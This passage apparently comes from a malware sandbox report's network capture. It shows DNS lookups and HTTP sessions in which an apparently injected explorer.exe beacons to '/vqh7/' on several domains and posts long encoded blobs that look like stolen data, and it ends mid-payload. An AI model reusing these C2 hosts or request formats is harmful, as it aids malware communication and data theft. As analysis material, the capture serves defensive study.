                                                              Feb 10, 2023 12:45:23.216640949 CET8.8.8.8192.168.2.30x94abNo error (0)www.gachthe365.sitegachthe365.siteCNAME (Canonical name)IN (0x0001)false
                                                              Feb 10, 2023 12:45:23.216640949 CET8.8.8.8192.168.2.30x94abNo error (0)gachthe365.site148.251.13.126A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:33.470618963 CET8.8.8.8192.168.2.30xfd2aNo error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                              Feb 10, 2023 12:45:33.470618963 CET8.8.8.8192.168.2.30xfd2aNo error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:43.635341883 CET8.8.8.8192.168.2.30xa128No error (0)www.krankenzusatz.netkrankenzusatz.netCNAME (Canonical name)IN (0x0001)false
                                                              Feb 10, 2023 12:45:43.635341883 CET8.8.8.8192.168.2.30xa128No error (0)krankenzusatz.net81.169.145.158A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:45:54.252531052 CET8.8.8.8192.168.2.30x3410No error (0)www.hotelyeah.tophotelyeah.topCNAME (Canonical name)IN (0x0001)false
                                                              Feb 10, 2023 12:45:54.252531052 CET8.8.8.8192.168.2.30x3410No error (0)hotelyeah.top75.102.22.168A (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:04.967170000 CET8.8.8.8192.168.2.30x5bd5Name error (3)www.tobinrasheedja.cyounonenoneA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:05.995754004 CET8.8.8.8192.168.2.30xad29Name error (3)www.tobinrasheedja.cyounonenoneA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:07.048252106 CET8.8.8.8192.168.2.30x4c62Name error (3)www.tobinrasheedja.cyounonenoneA (IP address)IN (0x0001)false
                                                              Feb 10, 2023 12:46:12.198293924 CET8.8.8.8192.168.2.30x42aaNo error (0)www.nativealternatives.com91.195.240.117A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.jewelryimpact.com
                                                              • www.specigain.online
                                                              • www.treebarktees.com
                                                              • www.gachthe365.site
                                                              • www.frogair.online
                                                              • www.krankenzusatz.net
                                                              • www.hotelyeah.top
                                                              • www.nativealternatives.com

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.34968381.17.18.19880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:44:55.405932903 CET124OUTGET /vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.jewelryimpact.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:44:55.434031010 CET125INHTTP/1.1 200 OK
                                                              accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                              cache-control: max-age=0, private, must-revalidate
                                                              connection: close
                                                              content-length: 618
                                                              content-type: text/html; charset=utf-8
                                                              date: Fri, 10 Feb 2023 11:44:54 GMT
                                                              server: nginx
                                                              set-cookie: sid=569369b8-a938-11ed-a437-6382673eb5bc; path=/; domain=.jewelryimpact.com; expires=Wed, 28 Feb 2091 14:59:02 GMT; max-age=2147483647; HttpOnly
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 65 77 65 6c 72 79 69 6d 70 61 63 74 2e 63 6f 6d 2f 76 71 68 37 2f 3f 34 73 48 58 71 3d 71 6d 4d 61 48 64 41 2d 4e 31 4d 46 26 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4e 6a 41 7a 4e 6a 59 35 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 32 4d 44 49 35 4e 44 6b 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 45 33 4e 33 4e 6f 61 6d 4d 77 4f 48 46 7a 64 6d 39 7a 63 7a 41 7a 62 33 49 77 62 32 51 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 59 77 4d 6a 6b 30 4f 54 55 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 32 4d 44 49 35 4e 44 6b 31 4e 44 45 32 4e 44 45 77 66 51 2e 64 55 47 4e 59 6e 53 47 6a 74 6e 33 47 42 46 59 59 71 70 66 33 73 72 59 42 38 70 33 4a 46 38 6a 66 53 56 73 43 6e 76 30 59 30 59 26 73 69 64 3d 35 36 39 33 36 39 62 38 2d 61 39 33 38 2d 31 31 65 64 2d 61 34 33 37 2d 36 33 38 32 36 37 33 65 62 35 62 63 26 75 31 75 61 3d 7a 36 57 46 7a 31 65 6b 6a 74 75 56 68 49 6e 75 53 74 63 6f 43 32 56 69 79 5a 73 46 56 62 34 25 32 46 57 41 50 31 49 63 43 59 41 63 77 32 75 6d 31 74 45 67 37 64 4f 73 67 61 52 72 67 75 49 71 7a 61 34 74 72 38 30 46 68 6e 41 30 59 79 5a 43 70 67 41 59 59 66 65 47 43 38 39 48 4d 30 6f 4d 4d 53 78 67 25 33 44 25 33 44 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NjAzNjY5NSwiaWF0IjoxNjc2MDI5NDk1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDE3N3NoamMwOHFzdm9zczAzb3Iwb2QiLCJuYmYiOjE2NzYwMjk0OTUsInRzIjoxNjc2MDI5NDk1NDE2NDEwfQ.dUGNYnSGjtn3GBFYYqpf3srYB8p3JF8jfSVsCnv0Y0Y&sid=569369b8-a938-11ed-a437-6382673eb5bc&u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg%3D%3D');</script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.349684199.192.22.19880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:00.737787962 CET126OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.specigain.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.specigain.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 46 59 52 6e 38 51 57 49 4d 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00
                                                              Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
                                                              Feb 10, 2023 12:45:01.060570002 CET127INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:00 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              10192.168.2.34969381.169.145.7280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:33.493596077 CET194OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.frogair.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.frogair.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 33 77 6e 65 37 48 65 4e 44 33 4c 43 62 2d 76 55 6a 41 71 42 77 72 6f 52 59 54 37 41 6b 2d 52 44 78 54 6c 64 73 38 6b 55 76 56 4e 54 71 58 6e 5a 64 6d 44 59 53 75 6e 48 67 38 73 52 52 4a 42 56 58 6f 61 46 47 2d 39 71 39 72 74 70 71 34 7a 31 39 69 34 35 41 5f 7e 74 48 51 53 6a 45 62 4f 33 49 62 6a 54 62 39 53 4d 4f 56 7e 7a 46 77 77 46 73 74 34 30 43 4a 59 71 30 53 37 79 56 6c 5a 55 66 74 62 6b 73 5a 47 4c 6b 64 45 64 62 58 55 55 78 65 79 68 7a 7a 43 31 6c 69 62 33 56 6e 62 78 53 43 75 68 34 46 6a 71 69 43 77 51 57 68 6e 5f 64 67 29 2e 00 00 00 00 00 00 00 00
                                                              Data Ascii: u1ua=3wne7HeND3LCb-vUjAqBwroRYT7Ak-RDxTlds8kUvVNTqXnZdmDYSunHg8sRRJBVXoaFG-9q9rtpq4z19i45A_~tHQSjEbO3IbjTb9SMOV~zFwwFst40CJYq0S7yVlZUftbksZGLkdEdbXUUxeyhzzC1lib3VnbxSCuh4FjqiCwQWhn_dg).
                                                              Feb 10, 2023 12:45:33.514517069 CET194INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:33 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              11192.168.2.34969481.169.145.7280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:36.036664963 CET200OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.frogair.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.frogair.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 33 77 6e 65 37 48 65 4e 44 33 4c 43 61 66 28 55 67 6a 43 42 34 72 6f 57 45 44 37 41 39 75 51 72 78 54 68 64 73 39 78 50 75 6e 68 54 74 41 6a 5a 64 45 62 59 51 75 6e 48 6d 38 73 56 63 70 42 44 58 6f 65 6a 47 38 6c 51 39 70 68 70 72 71 4c 31 7e 43 34 36 66 50 7e 57 47 51 53 6b 5a 72 4f 33 49 62 75 36 62 34 71 63 4f 55 47 7a 46 6d 6b 46 73 76 51 37 43 5a 59 72 73 53 37 79 56 6c 6c 6c 66 74 62 30 73 5a 66 47 6b 63 6b 64 64 42 6f 55 79 50 79 75 30 6a 43 32 37 53 61 6d 46 55 4b 61 53 42 71 31 79 54 72 67 31 48 74 73 66 69 61 44 4c 42 59 77 65 52 4a 45 36 33 7a 4c 30 53 63 66 57 53 4f 48 75 39 46 71 53 67 50 4c 42 5a 6b 2d 61 6a 52 49 5a 48 51 36 50 31 74 36 48 43 57 4d 70 44 4a 45 53 62 70 7a 55 4c 6b 37 6f 30 79 38 73 75 6a 4e 28 51 64 48 6c 43 70 67 62 4a 4f 6f 56 50 79 43 32 6d 73 43 31 66 4b 4c 52 43 38 4a 44 74 64 35 71 4d 53 74 58 6e 75 76 6d 41 41 56 79 78 6f 51 49 55 65 56 79 6b 38 70 66 67 78 77 74 67 6e 74 55 6d 46 45 57 6f 35 67 64 64 54 55 54 74 52 33 78 70 6f 41 32 6f 72 78 76 67 62 32 36 4f 6d 54 30 4f 46 37 74 73 65 67 42 6e 6e 61 78 4e 68 69 32 4a 66 5a 4e 51 49 74 4f 30 57 43 4a 78 78 30 65 6b 5a 56 7a 78 71 43 71 55 38 51 38 63 4e 6f 47 61 39 7a 64 5a 66 61 65 46 66 74 67 44 5a 6a 65 5a 46 78 52 45 4d 30 69 4a 30 35 47 46 5a 52 54 42 63 58 76 7a 61 4b 32 6a 4d 69 63 44 51 69 53 35 4a 48 76 63 5a 79 63 5f 30 75 62 44 59 76 73 73 51 52 48 6f 52 78 31 50 31 79 42 5a 68 37 78 6b 71 63 79 2d 75 79 4c 68 56 6d 35 6c 6a 53 64 42 58 70 57 68 59 70 77 46 6a 78 71 33 78 42 6e 32 6a 7a 4c 30 54 32 48 4c 5a 76 5a 37 68 46 74 4d 32 36 28 6c 42 53 45 2d 79 51 72 4e 52 5a 5a 64 36 4b 28 59 4b 4c 53 37 34 51 37 57 66 54 54 4c 28 39 67 55 56 46 76 30 69 44 41 5f 57 49 37 62 50 41 56 55 76 34 6b 6b 54 4a 6e 6c 55 6a 72 77 68 4f 62 56 77 38 36 6e 4f 69 71 41 52 41 4f 57 52 45 37 62 4a 4d 6d 67 75 4b 7a 44 71 4c 55 63 55 33 30 4a 30 76 59 34 4d 30 59 4f 74 34 71 6f 62 2d 48 69 28 69 74 76 43 56 54 46 51 4e 64 46 41 48 37 53 45 41 64 5f 6e 5a 44 6c 38 58 31 79 49 78 50 61 69 34 50 47 4a 69 45 72 6d 67 36 4a 72 72 71 34 6a 55 74 78 73 6e 6d 41 30 77 75 4e 6c 6b 45 45 47 34 69 6a 42 46 55 62 30 78 6e 73 46 75 31 42 55 62 56 33 74 69 6d 67 58 35 30 63 73 5f 33 65 74 44 47 4c 7e 5a 65 4a 34 64 61 39 57 74 73 74 45 5a 77 53 75 34 6b 71 63 55 6d 6a 37 6a 31 33 61 61 58 4d 32 71 71 7a 47 5a 58 6b 66 7a 68 4c 56 62 32 43 74 73 4b 69 51 69 54 72 4b 58 32 45 4e 50 7e 32 78 58 35 49 39 32 36 74 50 53 76 70 56 79 28 75 6a 74 4b 75 6b 37 53 67 7e 69 71 53 6f 62 30 65 6b 42 30 49 50 72 49 6b 50 42 68 68 4b 41 4e 45 58 69 37 48 50 4e 45 5a 7a 5f 50 32 4a 7a 37 78 59 6c 6e 44 4e 6e 53 33 5a 53 62 57 78 67 79 41 36 4a 34 71 4f 6b 6b 5f 28 5a 48 69 70 35 78 37 33 73 77 48 34 4f 6b 6e 33 44 37 78 53 6b 67 6e 63 63 6c 67 49 57 66 39 73 67 56 47 6f 73 33 4b 64 79 32 41 36 38 55 65 6f 6a 4c 6e 52 6c 46 52 34 57 67 51 51 33 65 4f 68 73 75 79 72 7a 64 50 31 61 7a 69 76 42 69 65 34 5a 68 43 46 70 52 4d 45 67 41 44 59 44 59 49 4e 77 52 55 6e 38 6b 38 4e 31 42 59 34 6d 51 5a 42 4b 64 6c 4d 61 5a 4c 47 53 52 53 38 75 75 2d 34 36 58 66 53 6e 34 4c 57 6e 71 38 6d 31 4f 4d 44 57 47 47 77 62 5a 6a 64 66 4e 6a 65 69 4b 6f 54 48 42 5a 6d 66 70 56 6e 4c 74 46 64 56 75 30 51 59 73 74 66 35 4d 39 54 75 62 36 4c 58 30 41 36 32 5a 48 6a 77 38 57 6b 66 32 6b 66 57 47 34 37 56 4f 51 46 67 68 43 49 41 4f 54 39 63 67 4e 59 4a 68 48 59 50 7a 70 42 4b 68 33 58 64 6a 39 36 71 31 4f 53 6b 4c 37 56 47 75 30 57 30 77 4d 72 47 65 41 53 6f 45 34 64 47 36 63 39 55 45 74 79 74 7e 2d 44 57 52 70 38 63 4a 55 4a 31 52 66 48 36 52 42 59 69 28 2d 6e 75 55 75 61 4e 77 56 7a 77 4b 63 73 32 42 54 52 7a 55 6d 77 52 41 31 76 6b 72 67 44 76 6a 42 65 49 77 4d 31 4a 7e 71 32 75 56 73 62 47 78 64 4d 4b 6a 77 77 4e 70 6e 5a 55 53 75 45 67 4f 37 4f 6f 54 75 65 44 41 4d 65 4d 32 68 6f 51 56 30 67 72 39 47 44 50 62 34 33 42 78 45 4c 51 64 65 65 51 77 4d 38 65 4b 6d 68 6b 36 73 32 33 79 6e 54 77 72 59 7e 50 67 76 62 6f 4b 4d 33 78 54 73 4e 56 45 75 50 5a 5a 78 43 77 31 47 77 50 31 66 53 47 79 6f 4d 71 33 58 7e 56 6e 39 54 62 51 62 6d 41 7e 4e 44 56 78 75 28 33 37 53 54 39 31 57
                                                              Data Ascii: u1ua=3wne7HeND3LCaf(UgjCB4roWED7A9uQrxThds9xPunhTtAjZdEbYQunHm8sVcpBDXoejG8lQ9phprqL1~C46fP~WGQSkZrO3Ibu6b4qcOUGzFmkFsvQ7CZYrsS7yVlllftb0sZfGkckddBoUyPyu0jC27SamFUKaSBq1yTrg1HtsfiaDLBYweRJE63zL0ScfWSOHu9FqSgPLBZk-ajRIZHQ6P1t6HCWMpDJESbpzULk7o0y8sujN(QdHlCpgbJOoVPyC2msC1fKLRC8JDtd5qMStXnuvmAAVyxoQIUeVyk8pfgxwtgntUmFEWo5gddTUTtR3xpoA2orxvgb26OmT0OF7tsegBnnaxNhi2JfZNQItO0WCJxx0ekZVzxqCqU8Q8cNoGa9zdZfaeFftgDZjeZFxREM0iJ05GFZRTBcXvzaK2jMicDQiS5JHvcZyc_0ubDYvssQRHoRx1P1yBZh7xkqcy-uyLhVm5ljSdBXpWhYpwFjxq3xBn2jzL0T2HLZvZ7hFtM26(lBSE-yQrNRZZd6K(YKLS74Q7WfTTL(9gUVFv0iDA_WI7bPAVUv4kkTJnlUjrwhObVw86nOiqARAOWRE7bJMmguKzDqLUcU30J0vY4M0YOt4qob-Hi(itvCVTFQNdFAH7SEAd_nZDl8X1yIxPai4PGJiErmg6Jrrq4jUtxsnmA0wuNlkEEG4ijBFUb0xnsFu1BUbV3timgX50cs_3etDGL~ZeJ4da9WtstEZwSu4kqcUmj7j13aaXM2qqzGZXkfzhLVb2CtsKiQiTrKX2ENP~2xX5I926tPSvpVy(ujtKuk7Sg~iqSob0ekB0IPrIkPBhhKANEXi7HPNEZz_P2Jz7xYlnDNnS3ZSbWxgyA6J4qOkk_(ZHip5x73swH4Okn3D7xSkgncclgIWf9sgVGos3Kdy2A68UeojLnRlFR4WgQQ3eOhsuyrzdP1azivBie4ZhCFpRMEgADYDYINwRUn8k8N1BY4mQZBKdlMaZLGSRS8uu-46XfSn4LWnq8m1OMDWGGwbZjdfNjeiKoTHBZmfpVnLtFdVu0QYstf5M9Tub6LX0A62ZHjw8Wkf2kfWG47VOQFghCIAOT9cgNYJhHYPzpBKh3Xdj96q1OSkL7VGu0W0wMrGeASoE4dG6c9UEtyt~-DWRp8cJUJ1RfH6RBYi(-nuUuaNwVzwKcs2BTRzUmwRA1vkrgDvjBeIwM1J~q2uVsbGxdMKjwwNpnZUSuEgO7OoTueDAMeM2hoQV0gr9GDPb43BxELQdeeQwM8eKmhk6s23ynTwrY~PgvboKM3xTsNVEuPZZxCw1GwP1fSGyoMq3X~Vn9TbQbmA~NDVxu(37ST91WkuyLmOn_BVS_eG0iQL6yVi8zKs9ZNdo7CydheNlpWFAKwVJAIGIPR1upjrtOI_1xap(zAnPk8ojCxgx1tX9FvZPeUNoBLsBkuTL23p6gCz6iy0(R3gZfUk21RMv7vPYnHQWD17WoF2DcdA(Rn1LXH2BeYyiE3-(kc8LCMOvM(HTs0OucO89XdmYNxAJCITQtcVb9D-(U5aYnSVnPJIva7QZXCKI61SPNAjfsC9irrtGsNWDgXGFiylj78Ey-OLe5ra1EouVLbOEkIQT9nk2h5cuYv329HbHysg3CHz0xyylzk5BjSpIMvzV-mORj4xeIVCIQwkB8S0VFstZOrWQPvGq0bVjkTBQYaT8Ht9wT8chtOOkfzOZ0YreXVP76WUKGASrXESStQ_ZWNwYP2ukidOJ0YmvlYtTU2r7R(55JVPP4yVn_MFG3Bjzk11cOE0VLhToNu1YEOpk6cfB9CW8s4F8AIc(NvXPPceEVFa33bg2Z(Z3zqfmSsPICUl~lV-VdYWggrNoMgLcNNTEeRZhKxczqWr4SyAxrQAoOoa(ouLwWiBnagGvV6us4ja2ufXw1hNBvcz0OCP1kA6tfWz003rk8uPfUM6x9TmfEF7aBYzgFEqP1(wk8cywMKbdg3i7-(HcxqAeS5t(e3uKAZMN0Ut8nVKbTWgAP9QiEqksftQkmBjle8ePjQebAbvR0LEm3uGjowUVOUNO5z9ChitExaNmhAajBcEF060AkM837sFbNKyXI2bfeqfX9A16a~aWF0_D8EWJ7JNE4LpuzjvKCiHQHCV0i6qB-dQKWP1eMB8nin3lzojSwGGHnQHRLfO55MZ9mrz2bCvYva066noAvMDhlWmmZETSGiOEdOk2YCv4AmoYjFh1oSGIYLjlU(dqEU5uCaTYX4Y4-7AI92-GxJWeHRQ9XijEmsobAtshhbAyXymCysDcYrrqM2z8Gn2UjnVTKRTEiEH0QkWAOuvBS(wwGq7nAZpdbBn6n~A1cS95tkJNV~kbg4Id0b4P6aq7MhfbuBhybZJlSRmsrcfaX9-Hi(1UTJJ~gggcR4q53z7IVobZJCZJrkMm-p56l1hahvtDw2bEaDy3NCWFONhcP7-7C7mCkxeFgywQeUO1jpJ0fRTyz9VXVUDqeoY5dbqBD3gdHofY9bJ6pbPoN0huFXQQXh41LDWk1JW2vsNmG2EWgKtrvDUbEPcvkhcErAuuFoHvhkX0zxf(JUbLXbuPeHYTOuzNb~kmx(5hXB8sGXB77vPIU0203i2p7xW~xvoc6uFxedA(a1kCXssQgYscUzbvqPLSw8mkroNmUykrxe9asl9GXYO6TeYRxXzpCF-pyFvMtpR8CjgJtQRdHCQJey5KMk28SFNf7Qhzu3RBiVdlDdLZEAeo3lpFjS9UMIq4lrEaGgFFTnAH9VRzvkhrRZ_3sIjV_jc3gqmUir5eVCOw37aWuc9mEDTqDOBBnXbOVxR1qh8PAHPfPYTmRkTLF8ZZvuPjKobHaa0~ksd(lPQh1E24RgXp2LU6rMBBMaW411NpotuERpOx5Q7Q4fAALWU(9E6TOLTn-SAl02LpYY9yUGa8ENAXaoO6B~sKNC5DSN00myXheJGV4USzYPwsyjXsP3umTEIRUloLZHr1VHSvLiV28~AB8WAx6vnr31_~jTxPpcRlKtubKJiOSSsOJXG~vOR1af4lbZTRue5PtLvCI9uSvkibY4YAx(X~DCOC3eg1hMfU3JY8j74oS4-7B8foJbEhEOh9nogBfRAVZ8Rcpn6XkFt9sZVNKOcGfn_AvnebjasbLjf8GuJ0rH75KJpHGhIAeATaTZug-d2fuad(VxZhYyOpYVBfsEzsZzpxJIi7GgLu0yJ1SYKZwwrpIROM6qwubb7TCOE1ucz1k0OfhVJm0C838weGqjkbzD6aS6Zghiekf78q_uzP1bk2SCSrLPvktnOqQ(R~2P7XyYGvxDMrqBl6TOzny~JyUSxB2eHMaRwjh~Plw(V~tBNRCd0D1UScIq_E-dCHZTuq_QNsmMz2GFrEKO9wrJdso19n4gkvr8Eo8gKF6f4OVeea1HGRknMRoJ-Gsi609tEN4d0BHIY3yGsmcFytKpNcb(wQ97HpB8u8eb5UH5Tqyv7KyAJlqmWGUVH2KVIeFTdOJewAAH0RrJgg0L45D92tcGxeYFMxkbOtBO_9yRE8LOAXKiatHaDRNciuA111QcxmMI7~4R3SvHxhzvWIPm82psUU